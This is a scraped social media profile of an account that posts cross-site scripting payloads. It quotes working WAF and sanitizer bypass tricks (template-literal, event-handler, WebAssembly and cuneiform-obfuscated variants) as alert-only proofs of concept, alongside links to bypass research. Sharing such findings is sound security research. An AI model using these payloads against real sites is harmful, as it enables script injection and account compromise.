XssPayloads Profile Banner
XSS Payloads Profile
XSS Payloads

@XssPayloads

Followers
52K
Following
13
Media
22
Statuses
2K

Joined November 2014
Don't wanna be here? Send us removal request.
@XssPayloads
XSS Payloads
7 days
August XSS challenge by @intigriti .
0
2
18
@grok
Grok
7 days
Join millions who have switched to Grok.
201
335
2K
@XssPayloads
XSS Payloads
15 days
3 Akamai WAF Bypass payloads by @akaclandestine .'a'.replace.call`1${/./}${alert}`.'a,'.replace`a${alert}`.'a'.replace(/./,alert).
0
29
196
@XssPayloads
XSS Payloads
1 month
A payload that hijacks the onsecuritypolicyviolation event, by Mikhail Khramenkov. <input style=x type="hidden" onsecuritypolicyviolation="alert(1)">.
1
22
115
@XssPayloads
XSS Payloads
1 month
GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify. A useful tool by @kevin_mizu.
0
21
87
@XssPayloads
XSS Payloads
1 month
A payload relying on obscure event handler for Safari and Trackpad click, by @stealthybugs . " onwebkitmouseforcewillbegin="confirm(origin)".
0
2
47
@XssPayloads
XSS Payloads
1 month
Exploiting Self-XSS Using Disk Cache, an interesting technique by @mehdiparandin .
0
9
58
@XssPayloads
XSS Payloads
1 month
A WASM payload by @shahmidoe . a.wasm:.(module .(func $f (import "m" "f")(param i32)) .(func (export "a")(param i32) . i32.const 64 . call $f . ) .). WebAssembly.instantiateStreaming(fetch('a.wasm'), {m:{f:alert}}).then(x=>{ x instance.exports.a(); });.
0
6
23
@XssPayloads
XSS Payloads
1 month
WAFFLED: Exploiting Parsing Discrepancies to Bypass Web Application Firewalls.Good research paper (and findings) by Seyed Ali Akhavani, Bahruz Jabiyev, Ben Kallus, Cem Topcuoglu, Sergey Bratus, and Engin Kirda.
1
8
49
@XssPayloads
XSS Payloads
1 month
Details here:
@xss0r
xss0r
1 month
XSS Payload WAF Bypass - Microsoft 2025 xss0r. <input type="checkbox" id="z" value="xss0r" style="display:none" &%2362;="" onchange="top[['alert'][0]](location.hostname);this.remove()"><label for="z" style="position:fixed;inset:0;cursor:crosshair"></label>. &%2362; is a
Tweet media one
0
1
8
@XssPayloads
XSS Payloads
1 month
A payload to bypass some filters by @xss0r . <input type="checkbox" id="z" value="xss0r" style="display:none" &%2362;="" onchange="top[['alert'][0]](location.hostname);this.remove()"><label for="z" style="position:fixed;inset:0;cursor:crosshair"></label>.
4
38
194
@XssPayloads
XSS Payloads
2 months
3 filters evasion techniques by @therceman .(function(x){this[x+`ert`](1)})`al`.window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2).document['default'+'View'][`\u0061lert`](3).
0
14
94
@XssPayloads
XSS Payloads
2 months
A cuneiform alphabet based payload by @viehgroup .𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")().
6
31
207